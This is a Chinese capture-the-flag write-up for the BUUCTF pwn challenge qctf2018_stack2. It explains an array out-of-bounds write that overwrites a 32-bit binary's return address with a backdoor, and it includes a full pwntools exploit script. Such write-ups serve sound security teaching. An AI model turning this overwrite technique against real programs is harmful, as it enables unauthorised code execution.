[BUUCTF]PWN——qctf2018_stack2

qctf2018_stack2

  1. 例行检查 ,32位程序,开启了canary和nx保护
    在这里插入图片描述

  2. 本地运行一下,看看大概的情况
    在这里插入图片描述

  3. 32位ida载入,检索字符串发现了后门
    在这里插入图片描述
    main函数太长了,贴一下关键部分,漏洞点在修改v13数组里的值。
    在这里插入图片描述

  4. 利用数组越界漏洞去修改ret,将ret修改成backdoor即可。
    一开始我想当然的认为偏移是0x70+4,但是实际利用的时候发现不对。动调找一下吧
    在这里插入图片描述
    我输入的数据是12,存储在了0xffffcf38处,v13数组的地址
    找一下函数结束的时候esp的地址
    在这里插入图片描述
    相差0xffffcfbc-0xffffcf38=0x84

  5. v13是char型,一次只能写入一个字节,因此要分四次来把ret修改成backdoor

from pwn import*
context.log_level = 'debug'
#p=remote('node3.buuoj.cn',28312)
p=process('./stack2')
elf=ELF('./stack2')

p.sendlineafter('have:','0')

offset=0x84

backdoor = [0x9b, 0x85, 0x04, 0x08]

for i in range(4):
	p.sendlineafter('5. exit','3')
	p.sendlineafter('change:',str(offset+i))
	p.sendlineafter('number:',str(backdoor[i]))


p.sendlineafter('5. exit','5')
p.interactive()

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值